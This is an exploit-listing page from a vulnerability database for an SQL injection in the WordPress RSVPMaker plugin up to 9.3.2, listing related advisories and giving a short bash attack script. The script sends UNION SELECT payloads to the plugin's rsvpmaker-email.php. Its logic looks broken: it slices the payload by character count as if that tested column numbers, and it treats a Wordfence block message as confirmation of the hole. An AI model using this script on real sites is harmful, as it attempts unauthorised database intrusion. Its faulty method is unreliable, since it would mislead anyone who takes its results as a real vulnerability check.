WordPress RSVPMaker 9.3.2 SQL Injection
🗓️ 15 Jan 2024 00:00:00Reported by Amirhossein BahramizadehType
packetstorm🔗 packetstormsecurity.com👁 372 Views
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| WordPress RSVPMaker 9.3.2 SQL Injection Vulnerability | 15 Jan 202400:00 | – | zdt | |
| CVE-2022-1768 | 26 Jan 202500:00 | – | circl | |
| WordPress plugin RSVPMaker SQL注入漏洞 | 13 Jun 202200:00 | – | cnnvd | |
| WordPress plugin RSVPMaker SQL注入漏洞 | 15 Jun 202200:00 | – | cnvd | |
| CVE-2022-1768 | 13 Jun 202213:08 | – | cve | |
| CVE-2022-1768 RSVPMaker <= 9.3.2 - Unauthenticated SQL Injection | 13 Jun 202213:08 | – | cvelist | |
| WordPress RSVPMaker <=9.3.2 - SQL Injection | 1 Aug 202610:03 | – | nuclei | |
| CVE-2022-1768 | 13 Jun 202214:15 | – | nvd | |
| CVE-2022-1768 | 13 Jun 202214:15 | – | osv | |
| WordPress RSVPMaker plugin <= 9.3.2 - Unauthenticated SQL Injection (SQLi) vulnerability | 17 May 202200:00 | – | patchstack |
10
`#!/bin/bash
# Set the URL of the website running the vulnerable plugin
url="http://example.com/wp-content/plugins/rsvpmaker/rsvpmaker-email.php"
# Set the number of columns in the query
columns=5
response=$(curl -s "$url")
query=$(echo "$response" | grep -oP 'FROM .* WHERE .*')
payload="' UNION SELECT 1,2,3,4,5-- "
# Test the query with different numbers of columns
for i in $(seq 1 $columns)
do
query_with_payload="${query%?*}?${payload:0:i}${query#*?}"
curl -s -X POST -d "$query_with_payload" "$url" | grep -q "Wordfence Security Error"
if [ $? -eq 0 ]
then
echo "Vulnerability confirmed with $i columns"
break
fi
done
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Jan 2024 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 25
CVSS 3.17.5 - 9.8
EPSS0.12003
SSVC